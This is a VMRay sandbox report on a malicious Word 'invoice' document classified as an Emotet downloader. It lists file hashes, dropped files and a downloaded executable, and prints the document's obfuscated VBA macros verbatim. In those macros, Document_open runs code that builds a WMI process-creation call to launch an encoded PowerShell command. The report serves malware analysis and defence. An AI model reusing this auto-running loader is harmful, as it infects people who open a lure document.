4c9e35f3...cccb | Files
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification:
Downloader
Trojan
Threat Names:
Generic.EmotetU.AA5F1DE6
C2/Generic-A
Mal/HTMLGen-A
...

invoice D2493_392827307.doc

Word Document

Created at 2020-01-29T14:10:00

...
Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\invoice D2493_392827307.doc Sample File Word Document
Malicious
...
»
Also Known As 4c9e35f3d5f555dda5f4373cf23fbb289c6067c70841be7022ba6da62e49cccbdoc (Embedded File)
Mime Type application/vnd.ms-word.document.macroEnabled.12
File Size 132.83 KB
MD5 8c809b4ac6d95ce85a0f04cd04b7a7ea Copy to Clipboard
SHA1 e82b3ab32b1b342a14ee86047689d9de1cdf1150 Copy to Clipboard
SHA256 4c9e35f3d5f555dda5f4373cf23fbb289c6067c70841be7022ba6da62e49cccb Copy to Clipboard
SSDeep 3072:3CEzuaZ9I8XO52I2DsTUyEpf/Eg22wNGdAB3It8KlRB0HO2:3CKRI2HDYUFf/XyGd230ROHN Copy to Clipboard
ImpHash None Copy to Clipboard
File Reputation Information
»
Severity
Blacklisted
First Seen 2020-01-29 14:02 (UTC+1)
Last Seen 2020-01-29 14:50 (UTC+1)
Names Document-Powerpoint.Trojan.Frs
Families Frs
Classification Trojan
Office Information
»
Revision 1
Create Time 2020-01-29 07:26:00+00:00
Modify Time 2020-01-29 07:26:00+00:00
Document Information
»
Application Microsoft Office Word
App Version 16.0000
Template Normal.dotm
Document Security NONE
Page Count 1
Line Count 1
Paragraph Count 1
Word Count 4
Character Count 25
Chars With Spaces 28
ScaleCrop False
SharedDoc False
Controls (1)
»
CLSID Control Name Associated Vulnerability
{6E182020-F460-11CE-9BCD-00AA00608E01} FormsFrame -
VBA Macros (4)
»
Macro #1: Bsswltgxsplu
» 
Attribute VB_Name = "Bsswltgxsplu"
Attribute VB_Base = "0{072D1825-9688-400E-BC4F-1D646CDCD038}{01180EF4-9887-44F9-80DC-8E060199E35B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Pkhypyfag()
Debug.Print "dhhhhhee" + nswww + "opendb"
End Sub
Macro #2: Iizgszjgq
» 
Attribute VB_Name = "Iizgszjgq"
Sub Zwdzjjxdak()
Const sss = 234
End Sub
Sub Yysnpzdbkxhwf()
Const sss = 234
End Sub
Sub Ibtakvpywi()
Const sss = 234
End Sub
Function Cbokboildamo()
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Dehwcbks)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 989
oeu4n = Vwcxzbeytmkyp
wkid = "pizdec"
dwewr = Ehhbdzxayqeqv
oiwnb = (Jesagfpnlrr)
p3nb = (261)
i1 = (Osfowwytcrfyy)
o0Gukiqccf = (Euotwjmuzmf)
u3 = (280) + p3nb
b7 = (Uzjxgnnbiil)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (734)
mbdu = Gioulmzarbj
bxvs = 175
ojbd = "pizdec" + iwh3
Ijtjnryyzgqx = "/=e^^hjbj//e===^@%%w/=e^^hjbj//e===^@%%/=e^^hjbj//e===^@%%/=e^^hjbj//e===^@%%i/=e^^hjbj//e===^@%%/=e^^hjbj//e===^@%%nmg/=e^^hjbj//e===^@%%mt/=e^^hjbj//e===^@%%/=e^^hjbj//e===^@%%" + ChrW(Int(wdKeyS)) + "/=e^^hjbj//e===^@%%:w/=e^^hjbj//e===^@%%in/=e^^hjbj//e===^@%%/=e^^hjbj//e===^@%%3/=e^^hjbj//e===^@%%2_" + Pfaaatpp.Rxlnceqmy + "ro/=e^^hjbj//e===^@%%ce/=e^^hjbj//e===^@%%/=e^^hjbj//e===^@%%s/=e^^hjbj//e===^@%%s"
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Xplydchi)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 258
oeu4n = Zbeyrphdwc
wkid = "pizdec"
dwewr = Hthlwjcs
oiwnb = (Rlbdyggmg)
p3nb = (242)
i1 = (Xwksruxhwyj)
o0Hrrrgygawtjtw = (Awjwlnkwwte)
u3 = (991) + p3nb
b7 = (Krhivfvgp)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (568)
mbdu = Hwnbdbyvh
bxvs = 507
ojbd = "pizdec" + iwh3
Tbqtyyjexmh = Dwzbcixzw(Ijtjnryyzgqx)
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Jahwbnij)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 159
oeu4n = Ntplkztukv
wkid = "pizdec"
dwewr = Zmgugdbdl
oiwnb = (Ccmljfglqt)
p3nb = (534)
i1 = (Xfrbbcytwe)
o0Vphhfhsz = (Mjxnjpekg)
u3 = (733) + p3nb
b7 = (Ajoocabnupyy)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (358)
mbdu = Uyzfiahlpsh
bxvs = 584
ojbd = "pizdec" + iwh3
Set Yczftylgkzmtu = GetObject(Tbqtyyjexmh)
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Ybvdnivrlf)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 844
oeu4n = Luwzccpa
wkid = "pizdec"
dwewr = Yhznfjpsjncg
oiwnb = (Eclxsfzzy)
p3nb = (757)
i1 = (Frpbgnbdddoda)
o0Cswicfjqua = (Hcvyiuqzszrc)
u3 = (44) + p3nb
b7 = (Dhcqylug)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (306)
mbdu = Cqdrwavbp
bxvs = 173
ojbd = "pizdec" + iwh3
Ztsupycatezdd = Pfaaatpp.Qohkbjqrbijj.Tag
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Imkpkielqcfoz)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 85
oeu4n = Yyrskbtcfhp
wkid = "pizdec"
dwewr = Znguedlvcbaqx
oiwnb = (Eyfavbunmmdx)
p3nb = (50)
i1 = (Eiupimcwkk)
o0Tvwrbnnyygbp = (Fatiafwlysfb)
u3 = (370) + p3nb
b7 = (Siovdahz)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (648)
mbdu = Kpkplyhfrngc
bxvs = 913
ojbd = "pizdec" + iwh3
Ckoseecn = Tbqtyyjexmh + ChrW(Int(wdKeyS)) + Pfaaatpp.Wgxksnmqb.Tag + Ztsupycatezdd
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Txcjnrmt)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 994
oeu4n = Wuufukziwznx
wkid = "pizdec"
dwewr = Pextbclgzwy
oiwnb = (Vggityest)
p3nb = (700)
i1 = (Bvuajqmvcoui)
o0Schpuxhdcdcp = (Zqvwffrfhlxj)
u3 = (872) + p3nb
b7 = (Otbxmqbv)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (476)
mbdu = Yckysqxt
bxvs = 760
ojbd = "pizdec" + iwh3
Hhxpnqml = Ckoseecn + Pfaaatpp.Rxlnceqmy
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Jxbtbipwrw)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 864
oeu4n = Hyzojkouqbtr
wkid = "pizdec"
dwewr = Xvbpbrclc
oiwnb = (Qecogblysgleo)
p3nb = (664)
i1 = (Wywhekgu)
o0Vbutswvnqtfl = (Ahsubmrmfy)
u3 = (451) + p3nb
b7 = (Ouhokkru)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (750)
mbdu = Qeajpqyqxksnh
bxvs = 920
ojbd = "pizdec" + iwh3
Do While Yczftylgkzmtu. _
Create(njkdsj & Knfygoqlxt, Utuyxaewtgot, Pvjuxusqp(Hhxpnqml), Ibbpgtqwoc, Ocjavfgejh, Jvavtbmaaynow)
Loop
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Iyvdmfftgosq)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 839
oeu4n = Xuivbqqvxpptk
wkid = "pizdec"
dwewr = Kmsmbxyrauhol
oiwnb = (Hcmyzmzugyb)
p3nb = (722)
i1 = (Fosvxxvc)
o0Hazdhbuc = (Himhmjklsmo)
u3 = (894) + p3nb
b7 = (Xlmbmroinh)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (65)
mbdu = Xzirtlww
bxvs = 439
ojbd = "pizdec" + iwh3
End Function
Function Pvjuxusqp(Skqovwnhug)
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Gchillxfygw)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 351
oeu4n = Rwhlypgsh
wkid = "pizdec"
dwewr = Fbnljydrdip
oiwnb = (Ktatfnri)
p3nb = (152)
i1 = (Loctjzdyypq)
o0Ylwacfxxck = (Epmmuvhf)
u3 = (857) + p3nb
b7 = (Xgetsajq)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (726)
mbdu = Hjcijnodds
bxvs = 218
ojbd = "pizdec" + iwh3
Set Pvjuxusqp = GetObject(Skqovwnhug)
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Ijgikoanvmue)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 381
oeu4n = Cmypooypcb
wkid = "pizdec"
dwewr = Jlnuoxdirbp
oiwnb = (Imqzvjpwxrrob)
p3nb = (870)
i1 = (Tshfhwfpzbxxb)
o0Awuqgbhqhsmq = (Vgnneozukvcd)
u3 = (470) + p3nb
b7 = (Xxmovdrvtke)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (807)
mbdu = Camvftwdvk
bxvs = 242
ojbd = "pizdec" + iwh3
Pvjuxusqp. _
showwindow = Qexerrnl + Skimvcalbgl
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Dlyhjufaczj)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 929
oeu4n = Wehpruucrzkb
wkid = "pizdec"
dwewr = Bubcmhxugvv
oiwnb = (Qcdlqsvwbzyp)
p3nb = (398)
i1 = (Ommnfxfegb)
o0Rybxmuxzdznnt = (Szvcmuxiith)
u3 = (111) + p3nb
b7 = (Pmwcotbxudmdr)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (743)
mbdu = Ozzuwgmel
bxvs = 600
ojbd = "pizdec" + iwh3
End Function
Function Dwzbcixzw(Ybkvjdreunbs)
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Nzhfoqgm)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 343
oeu4n = Qnfzhsigkpc
wkid = "pizdec"
dwewr = Dzleampqyh
oiwnb = (Jlafttyggjmy)
p3nb = (235)
i1 = (Qmnioyvmdgdm)
o0Azsgweygharwe = (Tnmihwdcq)
u3 = (377) + p3nb
b7 = (Zwhubgnzfg)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (735)
mbdu = Crvjfmqru
bxvs = 672
ojbd = "pizdec" + iwh3
Dwzbcixzw = Join(Split(Ybkvjdreunbs, "/=e^^hjbj//e===^@%%"), "")
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Frcfctsankqp)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 963
oeu4n = Chjbmgvwjjh
wkid = "pizdec"
dwewr = Pheouwpivmtfj
oiwnb = (Bzkvmsqboqai)
p3nb = (104)
i1 = (Htydvctjww)
o0Hguqwdnauj = (Mfzgqxuoty)
u3 = (182) + p3nb
b7 = (Ubnqbsdnczlj)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (753)
mbdu = Twuvoyunqqdms
bxvs = 323
ojbd = "pizdec" + iwh3
End Function
Function Knfygoqlxt()
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Ciaybzifmkf)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 27
oeu4n = Npnmlhpi
wkid = "pizdec"
dwewr = Fprjqnptydol
oiwnb = (Mietuyxlkvdp)
p3nb = (166)
i1 = (Prjhjmvjkp)
o0Wqhkmbovaddv = (Xufwgbjheguh)
u3 = (561) + p3nb
b7 = (Wcxoacbhezj)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (345)
mbdu = Ihmnntoo
bxvs = 683
ojbd = "pizdec" + iwh3
Nfmmtykebqti = ChrW(Dnpgkqpvepdq + wdKeyP + Dxiwjyhaqe)
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Petblzhcrjvb)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 657
oeu4n = Mqaikjqf
wkid = "pizdec"
dwewr = Dzctartbimt
oiwnb = (Zqzogujltovv)
p3nb = (598)
i1 = (Hebdjofymxocz)
o0Tkhaxarluklh = (Khxmrlwgjk)
u3 = (307) + p3nb
b7 = (Becaeutrado)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (156)
mbdu = Yqtgtyhdobq
bxvs = 894
ojbd = "pizdec" + iwh3
Vacsjtbog = Nfmmtykebqti + Pfaaatpp.Wvvfsmiwbnqmx + "-e "
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Uvxgazphgem)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 425
oeu4n = Bwevchnvfbv
wkid = "pizdec"
dwewr = Akgpkeaiqvfrp
oiwnb = (Ucnhyglfzao)
p3nb = (287)
i1 = (Toucpbzearth)
o0Kbzdmkwbd = (Ssofgovefob)
u3 = (583) + p3nb
b7 = (Boxmtktz)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (888)
mbdu = Aeawbpyr
bxvs = 318
ojbd = "pizdec" + iwh3
dse = Pfaaatpp.Phvfxtrlqsu.ControlTipText
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Tnyfmupnnk)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 383
oeu4n = Gmszwuxlapag
wkid = "pizdec"
dwewr = Qlcbmpmcm
oiwnb = (Cxccokypglhm)
p3nb = (117)
i1 = (Hyfmdmsp)
o0Dkmxgeea = (Uxvilfcqj)
u3 = (910) + p3nb
b7 = (Yhafqhpjsb)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (32)
mbdu = Yzdxajbggzpg
bxvs = 925
ojbd = "pizdec" + iwh3
Knfygoqlxt = Dwzbcixzw(Vacsjtbog + StrReverse(dse))
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Zmwhuphu)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 711
oeu4n = Yeivmnovlspp
wkid = "pizdec"
dwewr = Eynoyjvqhtr
oiwnb = (Dwhttfkqas)
p3nb = (959)
i1 = (Ctzhuojbh)
o0Btvmzhwoehdlz = (Wkzydgsiwpwin)
u3 = (85) + p3nb
b7 = (Dcaafaxsl)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (345)
mbdu = Dqyyizdv
bxvs = 988
ojbd = "pizdec" + iwh3
End Function
Sub Vmcuaqxjt()
Const sss = 234
End Sub
Sub Kdvmsovf()
Const sss = 234
End Sub
Sub Rxntkbtmdwls()
Const sss = 234
End Sub
Macro #3: Nqukletjuo
» 
Attribute VB_Name = "Nqukletjuo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Hvroaczehj()
Const sss = 234
End Sub
Sub Dlrkxkkhldanp()
Const sss = 234
End Sub
Sub Oejcwvfxa()
Const sss = 234
End Sub
Sub Swtaopbb()
Const sss = 234
End Sub
Sub Evwjmsxe()
Const sss = 234
End Sub
Private Sub Document_open()
Const sss = 234
Call Cbokboildamo
End Sub
Sub Yoxlzyhi()
Const sss = 234
End Sub
Sub Oqwvsnokokmnx()
Const sss = 234
End Sub
Sub Imsjchsfjd()
Const sss = 234
End Sub
Sub Haqityppnzbry()
Const sss = 234
End Sub
Sub Qlrlrwbqlp()
Const sss = 234
End Sub
Sub Qvlmsppg()
Const sss = 234
End Sub
Macro #4: Wgozpnam
» 
Attribute VB_Name = "Wgozpnam"
Attribute VB_Base = "0{10F21615-7B11-4C29-9192-2AEF3B3250A7}{F694B320-4008-4239-A8EC-DB0FFF5A89CA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Cipunklo()
Debug.Print "dhhhhhee" + nswww + "opendb"
End Sub
c:\users\aetadzjz\appdata\local\temp\~df8c6df2f3e5e3458f.tmp Dropped File Stream
Whitelisted
...
»
Also Known As c:\users\aetadzjz\appdata\local\temp\~df31df9286212b3e41.tmp (Dropped File)
Mime Type application/octet-stream
File Size 512 Bytes
MD5 bf619eac0cdf3f68d496ea9344137e8b Copy to Clipboard
SHA1 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 Copy to Clipboard
SHA256 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash None Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2011-07-06 01:20 (UTC+2)
Last Seen 2019-12-06 01:08 (UTC+1)
c:\users\aetadzjz\appdata\local\temp\~dfa7059dbfe0abfdcb.tmp Dropped File Stream
Whitelisted
...
»
Mime Type application/octet-stream
File Size 16.00 KB
MD5 ce338fe6899778aacfc28414f2d9498b Copy to Clipboard
SHA1 897256b6709e1a4da9daba92b6bde39ccfccd8c1 Copy to Clipboard
SHA256 4fe7b59af6de3b665b67788cc2f99892ab827efae3a467342b3bb4e3bc8e5bfe Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash None Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2011-07-06 05:09 (UTC+2)
Last Seen 2019-07-10 09:30 (UTC+2)
c:\users\aetadzjz\appdata\local\temp\~df7efad6c3c7baeda2.tmp Dropped File Stream
Whitelisted
...
»
Mime Type application/octet-stream
File Size 32.00 KB
MD5 bb7df04e1b0a2570657527a7e108ae23 Copy to Clipboard
SHA1 5188431849b4613152fd7bdba6a3ff0a4fd6424b Copy to Clipboard
SHA256 c35020473aed1b4642cd726cad727b63fff2824ad68cedd7ffb73c7cbd890479 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash None Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2011-06-11 22:08 (UTC+2)
Last Seen 2019-10-31 16:43 (UTC+1)
c:\users\aetadzjz\appdata\local\temp\vbe\msforms.exd Dropped File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 148.49 KB
MD5 ec6538a01c05e7e32ed465e6ca0b8ef3 Copy to Clipboard
SHA1 64292009e83580f7f779732a1d2f920fd7625120 Copy to Clipboard
SHA256 b0b20a8ef6e7b62ace40e2e74f5a21b0a20962f4e78f948607508f084040c57c Copy to Clipboard
SSDeep 1536:fmiIfzolWWpFpKKHAeedydBu4HTbTuo+o5aQxJudUl9yhQL3ow:fWc8WpFpKKHHedydDeo+oQLUlPow Copy to Clipboard
ImpHash None Copy to Clipboard
c:\users\aetadzjz\appdata\local\temp\~df2f22b74dd208dd11.tmp Dropped File Unknown
Unknown
...
»
Mime Type application/CDFV2
File Size 16.50 KB
MD5 cfd23da20f16e608d248602fc974aa02 Copy to Clipboard
SHA1 6f3a295bdf0405e67477ffb24fe9b2f621297088 Copy to Clipboard
SHA256 0c9b615081c9a9e1aece6a0bb07926a2d4d78a42984bac6aa443b535603a79e8 Copy to Clipboard
SSDeep 192:hsL0wNxW5P6OASi++kutZ+vRzqIvqOxjb/JVXYRxdOT4qxbbyOvctrjrFMlsnMRg:moFd5zpS3Qh86BJ10Lp Copy to Clipboard
ImpHash None Copy to Clipboard
C:\Users\aETAdzjz\AppData\Local\sendduck\sendduck.exe Downloaded File Binary
Unknown
...
»
Also Known As C:\Users\aETAdzjz\602.exe (Downloaded File)
yw9kvtprna55.exe (Embedded File)
Parent File analysis.pcap
Mime Type application/vnd.microsoft.portable-executable
File Size 532.04 KB
MD5 fe8341174cef34aa61be2be6fde0fe66 Copy to Clipboard
SHA1 f5541a16cd8ba86ab6624527a477c5bcbc3e2b4f Copy to Clipboard
SHA256 066432a51e70e12075454ee30f9160d7a278ba1b496005610711237cbf539e6a Copy to Clipboard
SSDeep 12288:y/W+p2+5oxoeg7pGy315ie+7IVmYPwy5dAyDxgR:+W+55yq7X31m7qldAIx Copy to Clipboard
ImpHash None Copy to Clipboard
3d70ce95eb1eb78620cc57fe1a6a479e6f2d70508bf813238e573863df000d6e Downloaded File Text
Unknown
...
»
Parent File analysis.pcap
Mime Type text/html
File Size 2.40 KB
MD5 e53fdf76753edcd8773ab17ae968bfd6 Copy to Clipboard
SHA1 4bea38cd83442080bdf51cd1db206715f9198955 Copy to Clipboard
SHA256 3d70ce95eb1eb78620cc57fe1a6a479e6f2d70508bf813238e573863df000d6e Copy to Clipboard
SSDeep 48:HTr+ulzMhjTgBLkJ7VKhnAzjtM48vwKgLzSNPhzSku:zr+ulgjsBwJ7VKhKMYxLiPh+ku Copy to Clipboard
ImpHash None Copy to Clipboard
Embedded URLs (2)
»
URL First Seen Categories Threat Names Reputation Status WHOIS Data
https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css - - -
Unknown
Not Queried
https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i - - -
Unknown
Not Queried
vbaProject.bin Embedded File Unknown
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\invoice D2493_392827307.doc
Mime Type application/CDFV2
File Size 68.50 KB
MD5 ec537f5304e48b82392c9cfb8cab4196 Copy to Clipboard
SHA1 ffefbe93db4909e0e57b22bd9a49e7269376d589 Copy to Clipboard
SHA256 11370bd6c67c5b2c93fead866566e4508ed21bbf675dd3bc8060c8ad6d7fb144 Copy to Clipboard
SSDeep 768:9XQ31O4QS301ItJ85KDo8Bwab9Tb0aAjgnDFUoMGBYhtbcbqrcwsFddp3pxI:xsc4QapJ85B8lRAjqxM08FwqowInlXI Copy to Clipboard
ImpHash None Copy to Clipboard
image1.jpeg Embedded File Image
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\invoice D2493_392827307.doc
Mime Type image/jpeg
File Size 94.01 KB
MD5 dbc43ff82d84c90b615e0490a3180a41 Copy to Clipboard
SHA1 1519ababceb0b8712b5e0d371dfc84a13b2c3292 Copy to Clipboard
SHA256 42b400ef49aec2fcad8bccaa70b530d30d803cd29ced2639245050a3d0810854 Copy to Clipboard
SSDeep 1536:UYZUiSCB52Ipmo0B1s6dkyKF+1TkU8DAMPmbjZAif/mhCZ3G2wFplGRUwDyTTB36:MXO52I2DsTUyEpf/Eg22wNGdAB3It8KR Copy to Clipboard
ImpHash None Copy to Clipboard
settings.xml Embedded File Text
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\invoice D2493_392827307.doc
Mime Type text/xml
File Size 2.95 KB
MD5 f77a4415f51ecf9d55723ceaa89728ef Copy to Clipboard
SHA1 bd16afb9d4bff156f8e9d0c54877ea5a54dcdb92 Copy to Clipboard
SHA256 c5b242b1270d1c06384f6497ab773ccace8fed8d416deef5604ae477be84f8ab Copy to Clipboard
SSDeep 48:ciec6mNYYNEbliS+B1+6+T+y4+2+kCpb1AloM+lqM+IyM+wM+wM+obqM+3OAayVQ:+c6mmY+bliSwH2OxNspAlNExbuEvnrTR Copy to Clipboard
ImpHash None Copy to Clipboard
document.xml Embedded File Text
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\invoice D2493_392827307.doc
Mime Type text/xml
File Size 5.75 KB
MD5 6766f5ab19134623c3a42c9514a9b866 Copy to Clipboard
SHA1 b7efd878e5fc527a77d125b916c290b985d4671f Copy to Clipboard
SHA256 da16b52903fc96aa62172c02bda5532b3e6652cc1791fe887ae63b6060d9a6e0 Copy to Clipboard
SSDeep 96:vmlAKAzHLCswiZS6mmY+bzZliSwH2Ox/iZowIFe81qtsw3zT4J5whDtwKwa4An4b:sgmmY+ZsjFe81zwjJqh Copy to Clipboard
ImpHash None Copy to Clipboard
c:\users\aetadzjz\appdata\roaming\microsoft\forms\winword.box Dropped File Unknown
Not Queried
...
»
Mime Type -
File Size 0 Bytes
MD5 d41d8cd98f00b204e9800998ecf8427e Copy to Clipboard
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 Copy to Clipboard
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash None Copy to Clipboard
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image